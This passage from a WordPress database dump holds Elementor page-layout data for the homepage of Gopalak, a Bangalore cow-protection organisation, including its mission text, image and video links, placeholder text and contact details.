prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9590,1613,'_elementor_page_assets','a:0:{}'),(9592,1614,'_elementor_edit_mode','builder'),(9593,1614,'_elementor_template_type','wp-page'),(9594,1614,'_elementor_version','3.7.8'),(9595,1614,'_wp_page_template','elementor_canvas');
INSERT INTO `wp_postmeta` VALUES (9596,1614,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 